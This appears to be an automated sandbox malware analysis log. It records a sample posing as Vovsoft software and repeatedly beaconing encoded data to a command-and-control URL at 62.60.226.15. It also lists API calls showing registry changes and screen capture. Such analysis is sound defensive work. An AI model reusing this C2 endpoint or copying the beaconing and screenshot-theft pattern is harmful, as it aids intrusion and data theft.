            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
            Source: global trafficHTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.60.226.15Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31 Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
            Source: Joe Sandbox View | ASN Name: ASLINE-AS-APASLINELIMITEDHK
            Source: unknown | TCP traffic detected without corresponding DNS query: 62.60.226.15
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_032127E0 recv,recv,recv,recv
            Source: unknown | HTTP traffic detected: POST /8fj482jd9/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.60.226.15 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
            Source: explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/
            Source: explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/8fj482jd9/index.php
            Source: explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/8fj482jd9/index.php1
            Source: explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/8fj482jd9/index.php3
            Source: explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/8fj482jd9/index.php5
            Source: explorer.exe, 0000000A.00000002.3893734835.0000000003347000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.60.226.15/8fj482jd9/index.php?B
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
            Source: pTvHtQDXio.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: pTvHtQDXio.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: pTvHtQDXio.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: pTvHtQDXio.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://ocsp.digicert.com0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://ocsp.digicert.com0A
            Source: pTvHtQDXio.exe | String found in binary or memory: http://ocsp.digicert.com0C
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0L
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
            Source: pTvHtQDXio.exe | String found in binary or memory: http://ocsp.digicert.com0X
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcd.com0&
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com/
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com/help/
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.com/openU
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.comopenS
            Source: pTvHtQDXio.exe | String found in binary or memory: http://vovsoft.comopenU
            Source: pTvHtQDXio.exe | String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
            Source: pTvHtQDXio.exe | String found in binary or memory: http://www.color.org
            Source: pTvHtQDXio.exe | String found in binary or memory: http://www.digicert.com/CPS0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: pTvHtQDXio.exe | String found in binary or memory: http://www.indyproject.org/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004DA1000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.00000000052BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.info-zip.org/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/cps0(
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/rpa00
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0
            Source: pTvHtQDXio.exe | String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
            Source: pTvHtQDXio.exe | String found in binary or memory: https://vovsoft.com/php/ocr_download.php?lang=
            Source: pTvHtQDXio.exe | String found in binary or memory: https://vovsoft.com/translation/
            Source: pTvHtQDXio.exe | String found in binary or memory: https://vovsoft.com/translation/openU
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
            Source: pTvHtQDXio.exe | String found in binary or memory: https://www.google.com/search?q=openSV
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_032061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority
            Source: C:\Users\user\Desktop\pTvHtQDXio.exe | Code function: 0_2_0076A6D5 NtQuerySystemInformation
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_032061F0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0320B700
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03244347
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_032460F4
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0323C9DD
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03232F20
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03204EF0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0323D169
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_032051A0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0322B7C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03205450
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03241BD7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0322F9DB
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_03245FD4
